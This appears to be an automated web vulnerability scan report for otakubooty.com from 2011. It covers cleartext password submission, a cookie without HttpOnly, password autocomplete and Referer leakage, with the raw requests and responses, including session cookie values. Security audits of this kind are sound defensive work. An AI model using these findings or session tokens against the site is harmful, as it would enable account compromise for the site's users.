Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 849360
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Info, H
...[SNIP]...
<div class="foobar"><form style="display:inline" action="/Default.asp" method="post"><INPUT TYPE=HIDDEN NAME="action" VALUE="login">
...[SNIP]...
<input name="login" size=11 maxlength=25 value=""> Password <input type="password" id="foobarpassword" name="password" size=11 maxlength=25> <input type="submit" value="Sign In">
...[SNIP]...

2.6. http://otakubooty.com/otaku_news.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_news.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /otaku_news.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 32063
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: OtakuBo
...[SNIP]...
<div class="foobar"><form style="display:inline" action="/Default.asp" method="post"><INPUT TYPE=HIDDEN NAME="action" VALUE="login">
...[SNIP]...
<input name="login" size=11 maxlength=25 value=""> Password <input type="password" id="foobarpassword" name="password" size=11 maxlength=25> <input type="submit" value="Sign In">
...[SNIP]...

2.7. http://otakubooty.com/otaku_search.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_search.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /otaku_search.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 21505
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Find Me
...[SNIP]...
<div class="foobar"><form style="display:inline" action="/Default.asp" method="post"><INPUT TYPE=HIDDEN NAME="action" VALUE="login">
...[SNIP]...
<input name="login" size=11 maxlength=25 value=""> Password <input type="password" id="foobarpassword" name="password" size=11 maxlength=25> <input type="submit" value="Sign In">
...[SNIP]...

2.8. http://otakubooty.com/otaku_signup.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_signup.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /otaku_signup.asp HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/otaku_help.asp?tab=mailpassword
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=96346818.1297459802.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ASPSESSIONIDASBCQBRR=CPAPGNJCGFADCFPPEODBKAFD; password=; __utma=96346818.797814522.1297452653.1297452653.1297459802.2; __utmc=96346818; __utmb=96346818.4.10.1297459802

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 21:29:39 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Vary: Accept-Encoding
Content-Length: 17458


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Join Ot
...[SNIP]...
<div class="indent">    
           
           
           <form action="otaku_signup.asp#signupform" method=post>
           
           <P class="dialog_box_border" style="margin:30px 10px 20px 0px">
...[SNIP]...
<BR>
                       <input type=password name="password" value="" size=30 maxlength=25>
                       </P>
...[SNIP]...
<BR>
                       <input type=password name="password_confirm" value="" size=30 maxlength=50>
                       </P>
...[SNIP]...

2.9. http://otakubooty.com/otaku_signup.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_signup.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /otaku_signup.asp HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/otaku_help.asp?tab=mailpassword
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=96346818.1297459802.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ASPSESSIONIDASBCQBRR=CPAPGNJCGFADCFPPEODBKAFD; password=; __utma=96346818.797814522.1297452653.1297452653.1297459802.2; __utmc=96346818; __utmb=96346818.4.10.1297459802

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 21:29:39 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Vary: Accept-Encoding
Content-Length: 17458


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Join Ot
...[SNIP]...
<div class="foobar"><form style="display:inline" action="/Default.asp" method="post"><INPUT TYPE=HIDDEN NAME="action" VALUE="login">
...[SNIP]...
<input name="login" size=11 maxlength=25 value=""> Password <input type="password" id="foobarpassword" name="password" size=11 maxlength=25> <input type="submit" value="Sign In">
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://otakubooty.com
Path:   /Default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /Default.asp? HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 19:29:46 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Set-Cookie: ASPSESSIONIDASBCQBRR=NDLOGNJCDHMPLHFJEKFDNPNP; path=/
Vary: Accept-Encoding
Content-Length: 31846


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: OtakuBo
...[SNIP]...

4. Password field with autocomplete enabled  previous  next
There are 9 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


4.1. http://otakubooty.com/Default.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /Default.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Default.asp? HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 19:29:46 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Set-Cookie: ASPSESSIONIDASBCQBRR=NDLOGNJCDHMPLHFJEKFDNPNP; path=/
Vary: Accept-Encoding
Content-Length: 31846


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: OtakuBo
...[SNIP]...
<div class="foobar"><form style="display:inline" action="/Default.asp" method="post"><INPUT TYPE=HIDDEN NAME="action" VALUE="login">
...[SNIP]...
<input name="login" size=11 maxlength=25 value=""> Password <input type="password" id="foobarpassword" name="password" size=11 maxlength=25> <input type="submit" value="Sign In">
...[SNIP]...

4.2. http://otakubooty.com/oa.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /oa.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /oa.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 11311
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->

<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http
...[SNIP]...
</p>
   
   <form action="/oa.asp?" method=POST>
   <input TYPE=HIDDEN NAME="action" VALUE="login">
...[SNIP]...
<BR>
       <input name="password" type=password size=15 maxlength=25>
   </p>
...[SNIP]...

4.3. http://otakubooty.com/oa.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /oa.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /oa.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 11311
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->

<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http
...[SNIP]...
<div class="foobar"><form style="display:inline" action="/Default.asp" method="post"><INPUT TYPE=HIDDEN NAME="action" VALUE="login">
...[SNIP]...
<input name="login" size=11 maxlength=25 value=""> Password <input type="password" id="foobarpassword" name="password" size=11 maxlength=25> <input type="submit" value="Sign In">
...[SNIP]...

4.4. http://otakubooty.com/of.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /of.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /of.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 35078
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Gen. Ch
...[SNIP]...
<div class="foobar"><form style="display:inline" action="/Default.asp" method="post"><INPUT TYPE=HIDDEN NAME="action" VALUE="login">
...[SNIP]...
<input name="login" size=11 maxlength=25 value=""> Password <input type="password" id="foobarpassword" name="password" size=11 maxlength=25> <input type="submit" value="Sign In">
...[SNIP]...

4.5. http://otakubooty.com/otaku_help.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_help.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /otaku_help.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 849360
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Info, H
...[SNIP]...
<div class="foobar"><form style="display:inline" action="/Default.asp" method="post"><INPUT TYPE=HIDDEN NAME="action" VALUE="login">
...[SNIP]...
<input name="login" size=11 maxlength=25 value=""> Password <input type="password" id="foobarpassword" name="password" size=11 maxlength=25> <input type="submit" value="Sign In">
...[SNIP]...

4.6. http://otakubooty.com/otaku_news.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_news.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /otaku_news.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 32063
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: OtakuBo
...[SNIP]...
<div class="foobar"><form style="display:inline" action="/Default.asp" method="post"><INPUT TYPE=HIDDEN NAME="action" VALUE="login">
...[SNIP]...
<input name="login" size=11 maxlength=25 value=""> Password <input type="password" id="foobarpassword" name="password" size=11 maxlength=25> <input type="submit" value="Sign In">
...[SNIP]...

4.7. http://otakubooty.com/otaku_search.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_search.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /otaku_search.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 21505
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Find Me
...[SNIP]...
<div class="foobar"><form style="display:inline" action="/Default.asp" method="post"><INPUT TYPE=HIDDEN NAME="action" VALUE="login">
...[SNIP]...
<input name="login" size=11 maxlength=25 value=""> Password <input type="password" id="foobarpassword" name="password" size=11 maxlength=25> <input type="submit" value="Sign In">
...[SNIP]...

4.8. http://otakubooty.com/otaku_signup.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_signup.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /otaku_signup.asp HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/otaku_help.asp?tab=mailpassword
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=96346818.1297459802.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ASPSESSIONIDASBCQBRR=CPAPGNJCGFADCFPPEODBKAFD; password=; __utma=96346818.797814522.1297452653.1297452653.1297459802.2; __utmc=96346818; __utmb=96346818.4.10.1297459802

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 21:29:39 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Vary: Accept-Encoding
Content-Length: 17458


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Join Ot
...[SNIP]...
<div class="indent">    
           
           
           <form action="otaku_signup.asp#signupform" method=post>
           
           <P class="dialog_box_border" style="margin:30px 10px 20px 0px">
...[SNIP]...
<BR>
                       <input type=password name="password" value="" size=30 maxlength=25>
                       </P>
...[SNIP]...
<BR>
                       <input type=password name="password_confirm" value="" size=30 maxlength=50>
                       </P>
...[SNIP]...

4.9. http://otakubooty.com/otaku_signup.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_signup.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /otaku_signup.asp HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/otaku_help.asp?tab=mailpassword
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=96346818.1297459802.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ASPSESSIONIDASBCQBRR=CPAPGNJCGFADCFPPEODBKAFD; password=; __utma=96346818.797814522.1297452653.1297452653.1297459802.2; __utmc=96346818; __utmb=96346818.4.10.1297459802

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 21:29:39 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Vary: Accept-Encoding
Content-Length: 17458


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Join Ot
...[SNIP]...
<div class="foobar"><form style="display:inline" action="/Default.asp" method="post"><INPUT TYPE=HIDDEN NAME="action" VALUE="login">
...[SNIP]...
<input name="login" size=11 maxlength=25 value=""> Password <input type="password" id="foobarpassword" name="password" size=11 maxlength=25> <input type="submit" value="Sign In">
...[SNIP]...

5. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. http://otakubooty.com/Default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /Default.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Default.asp? HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 19:29:46 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Set-Cookie: ASPSESSIONIDASBCQBRR=NDLOGNJCDHMPLHFJEKFDNPNP; path=/
Vary: Accept-Encoding
Content-Length: 31846


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: OtakuBo
...[SNIP]...
<div class="blurb_summary"><iframe title="YouTube video player" class="youtube-player" type="text/html" width="640" height="390" src="http://www.youtube.com/embed/Gxez4llQ_Yc" frameborder="0" allowFullScreen></iframe>
...[SNIP]...
</a><a href="http://digg.com/submit?phase=2&url=http%3A%2F%2Fotakubooty%2Ecom%2Fshow%5Farticle%2Easp%3Fid%5Farticle%3D5808&title=Relevant+To+All+Of+Our+Interests&bodytext=Dallas+Stars%27+hockey+arena+uses+Punch%2DOut%21%21+training+music+for+a+hockey+fight%2E&topic=video%5Fsports"><img src="images/diggthisstory.png">
...[SNIP]...
<BR><a href="http://www.flickr.com/photos/johnbooty/sets/72157625857239628/">View 45 OtakuBooty MAGFest pictures on Flickr...</a>
...[SNIP]...
</a><a href="http://digg.com/submit?phase=2&url=http%3A%2F%2Fotakubooty%2Ecom%2Fshow%5Farticle%2Easp%3Fid%5Farticle%3D5807&title=MAGFest+2011&bodytext=OtakuBooty+had+fun+drinking+and+duct+tape+cosplaying+at+MAGFest+2011%2E&topic="><img src="images/diggthisstory.png">
...[SNIP]...
</a><a href="http://digg.com/submit?phase=2&url=http%3A%2F%2Fotakubooty%2Ecom%2Fshow%5Farticle%2Easp%3Fid%5Farticle%3D5806&title=From+Our+Clan+To+Yours&bodytext=Happy+Wu+Year%21&topic=movies"><img src="images/diggthisstory.png">
...[SNIP]...
</a><a href="http://digg.com/submit?phase=2&url=http%3A%2F%2Fotakubooty%2Ecom%2Fshow%5Farticle%2Easp%3Fid%5Farticle%3D5805&title=All+The+Cool+Kids+Are+Going+To+MAGFEST&bodytext=See+you+at+MAGfest%2E&topic="><img src="images/diggthisstory.png">
...[SNIP]...
</a><a href="http://digg.com/submit?phase=2&url=http%3A%2F%2Fotakubooty%2Ecom%2Fshow%5Farticle%2Easp%3Fid%5Farticle%3D5804&title=OtakuBooty+Is+Excited+About+TRON&bodytext=John+Booty+and+his+brother+are+excited+about+TRON%2E&topic="><img src="images/diggthisstory.png">
...[SNIP]...
<div class="blurb_avatar"><A href="http://littlest-thought.blogspot.com/">Posted By<BR>
...[SNIP]...
</a><a href="http://digg.com/submit?phase=2&url=http%3A%2F%2Fotakubooty%2Ecom%2Fshow%5Farticle%2Easp%3Fid%5Farticle%3D5803&title=Turkey+Day+Fatty+Thankfulness&bodytext=This+year+for+Thanksgiving%2E%2E%2E&topic="><img src="images/diggthisstory.png">
...[SNIP]...
</a>, a Marine and all-around fine hombre. <a href="http://www.samuelcorumphoto.com/index2.php?v=v1">His Iraq pictures can be found under the Galleries link on his site</a>
...[SNIP]...
